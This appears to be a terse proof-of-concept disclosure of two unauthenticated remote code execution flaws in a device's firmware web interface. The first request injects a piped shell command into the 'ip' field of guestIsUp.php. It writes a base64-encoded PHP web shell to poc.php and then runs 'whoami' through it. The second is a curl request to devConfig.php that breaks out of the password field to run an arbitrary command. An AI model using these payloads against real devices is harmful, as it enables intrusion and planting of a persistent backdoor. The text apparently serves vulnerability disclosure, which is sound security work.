echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/guestIsUp.phpip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00GET /guest_auth/poc.php?cmd=whoami
Another unauthorized RCE in same firmwarePoC: curl http://host/openApi/devConfig.php?a=login -X POST -d "{\"admin\":\"admin\",\"encry\":true,\"password\":\"1'; COMMAND ;echo 'a\"}"